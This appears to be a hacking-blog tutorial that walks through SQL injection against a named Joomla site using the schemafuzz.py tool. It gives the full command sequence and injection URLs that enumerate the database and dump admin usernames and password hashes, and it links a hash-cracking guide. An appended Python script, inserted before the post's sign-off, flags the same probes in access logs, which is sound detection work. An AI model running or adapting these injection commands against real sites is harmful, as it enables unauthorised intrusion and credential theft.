POC : Use SCHEMAFUZZ

Now I will show you how an SQL injection vulnerability is used to get a username and password.
This web site is Joomla based, and you can use this technique with any web site based on it.
I use a script written in the Python programming language, called Schemafuzz.py.

The first step is to find a target....

as shown below ...


Then we must check that the web site is vulnerable to SQL injection by adding a single quote (') at the end of the URL;
if an error page appears, it means the site is vulnerable.
This web site shows us the following error:
Warning: sort() expects parameter 1 to be array, null given in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 168

Warning: natsort() [function.natsort]: The argument should be an array in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 170
as shown below ...


OK, this is the Schemafuzz.py file
as shown below ...


And if we use the command "./schemafuzz.py -h" we will see all the options of the script....
as shown below ...


Next, we need to find out how many columns there are and the magic column number, with the command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5" --findcol
option -u = URL
option --findcol = to find the columns
as shown below ...


The result is like this
as shown below ...


Next, we use the command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --info
option --info = to find the database used
as shown below ...


The result is like this
as shown below ...

From that result we know that the database used is "rssarchive", so the next command we use is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --schema -D rssarchive
option --schema = to list all tables and columns in a database
option -D = the database we want to look at
as shown below ...


The result is like this
as shown below ...


From that picture we find a table called jos_users with the columns username, password, usertype, etc., which store the username and password of the Joomla admin.
So we use one last command to get the username and password. The command is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D rssarchive -T jos_users -C username,password,usertype
as shown below ...


The result is like this
as shown below ...


From that picture we get the username and password.
The next step is to crack that password. You can see how in my blog post http://web-vuln.blogspot.com/2010/01/cracking-password-joomla-hash-md5salt.html
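Seen from the server side, the walkthrough above leaves a recognisable trail in the web server's access log: a quote appended to the numeric biobookid parameter, then an AND 1=2 UNION SELECT request carrying schemafuzz's darkc0de column marker. The script below is an added example, not part of the original post or of schemafuzz, that flags that pattern in constructed Apache-style log lines (the IPs, timestamps and sizes are made up for the example):

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (IPs, timestamps and sizes are made up for this example).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2010:12:00:01 +0000] "GET /index.php?option=com_biographies&task=showFile&biobookid=5 HTTP/1.1" 200 4821
203.0.113.5 - - [10/Jan/2010:12:00:09 +0000] "GET /index.php?option=com_biographies&task=showFile&biobookid=5' HTTP/1.1" 200 612
203.0.113.5 - - [10/Jan/2010:12:00:31 +0000] "GET /index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3 HTTP/1.1" 200 3307
198.51.100.7 - - [10/Jan/2010:12:02:00 +0000] "GET /index.php?option=com_biographies&task=showFile&biobookid=12 HTTP/1.1" 200 4799
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.{0,40}\bselect\b", re.IGNORECASE | re.DOTALL)
NUMERIC_PARAMS = {"biobookid"}   # parameters the component expects to be integers
TOOL_MARKERS = ("darkc0de",)     # column marker string that schemafuzz injects

def classify_request(path):
    """Return the reasons a request path looks like SQL injection probing ([] if clean)."""
    reasons = []
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:           # parse_qs already decoded %xx and '+'
            if name in NUMERIC_PARAMS and not value.isdigit():
                reasons.append(f"non-numeric {name}")
            if "'" in value:
                reasons.append("quote probe")
            if UNION_RE.search(value):
                reasons.append("union select")
            for marker in TOOL_MARKERS:
                if marker in value.lower():
                    reasons.append(f"tool marker {marker}")
    return reasons

def scan_log(log_text):
    """Return (client_ip, path, reasons) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        reasons = classify_request(path)
        if reasons:
            hits.append((ip, path, reasons))
    return hits

if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(reasons)}  {path}")
```

Two or more hits from one client within a minute, as in the sample, is the enumeration sequence the post walks through; fixing the component so biobookid is cast to an integer before it reaches the query removes the underlying bug.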


You can download the schemafuzz.py script HERE

See u next soon.....
